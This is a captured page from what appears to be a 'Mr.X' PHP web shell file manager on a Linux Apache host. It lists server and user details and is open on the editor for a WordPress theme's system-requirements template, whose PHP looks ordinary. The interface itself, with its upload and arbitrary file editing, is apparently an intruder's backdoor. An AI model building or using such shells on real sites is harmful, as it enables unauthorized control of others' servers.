🤩 File Manager - Mr.X
PHP:
8.3.33
Server:
Apache
OS:
Linux 5.14.0-611.49.1.el9_7.x86_64
User:
websparkit
Navigate
Upload:
Upload
New File
New Folder
Editing:page-system-requirements.php
<?php if ( ! defined( 'ABSPATH' ) ) exit( 'No direct script access allowed' ); /** * Template "System requirements" for 8theme dashboard. * * @since 6.3.10 * @version 1.0.0 */ if (isset($_GET['et_clear_wc_system_status_theme_info'])){ delete_transient( 'wc_system_status_theme_info' ); wp_redirect('?page=et-panel-system-requirements'); exit; } if (isset($_GET['et_clear_theme_templates_overrides_info'])) { delete_site_transient('xstore_templates_overrides'); wp_redirect('?page=et-panel-system-requirements'); } if (isset($_GET['et_clear_system_information'])){ delete_transient( 'etheme_system_information' ); delete_transient( 'etheme_system_requirements_test_result' ); delete_transient( 'etheme_system_requirements_system_logs' ); wp_redirect('?page=et-panel-system-requirements'); exit; } $global_admin_class = EthemeAdmin::get_instance(); ?> <h2 class="etheme-page-title etheme-page-title-type-2"><?php echo esc_html__('System Requirements', 'xstore'); ?> <a href="?page=et-panel-system-requirements&et_clear_system_information" class="et-button"> <?php $global_admin_class->get_loader(); ?> <span class="dashicons dashicons-image-rotate"></span> <span><?php esc_html_e( 'Check again', 'xstore' ); ?></span> </a> </h2> <p> <?php echo esc_html__(' Before using the theme, make sure your server and WordPress meet the theme\'s requirements. You can handle these adjustments yourself or reach out to your hosting provider to request increases in the following minimums.', 'xstore'); ?> </p> <br/> <?php $system = class_exists('Etheme_System_Requirements') ? Etheme_System_Requirements::get_instance() : new Etheme_System_Requirements(); $system->html(); $result = $system->result(); ?> <br/> <br/> <h2 class="etheme-page-title etheme-page-title-type-2"><?php echo esc_html__('Additional information', 'xstore'); ?></h2> <br/> <?php $system->wp_html(); ?> <br/> <br/> <?php $system->wp_active_plugins(); ?> <?php if (is_child_theme()) : $system->template_overrides(); endif; ?> <h2 class="etheme-page-title etheme-page-title-type-2"><?php echo esc_html__('WooCommerce system info cache', 'xstore'); ?> <a href="<?php echo add_query_arg(array('page' => 'et-panel-system-requirements', 'et_clear_wc_system_status_theme_info' => 'true'), admin_url('admin.php')) ?>" class="et-button"> <?php $global_admin_class->get_loader(); ?> <span class="dashicons dashicons-image-rotate"></span> <span><?php esc_html_e( 'Clear cache', 'xstore' ); ?></span> </a> </h2> <p class="et-message et-info"> <?php echo esc_html__('Please ensure that you clear the WooCommerce system cache after updating the theme, as this may cause outdated files to remain.', 'xstore'); ?> </p> <br/>
Save Changes
Cancel
Create New File
Create New Folder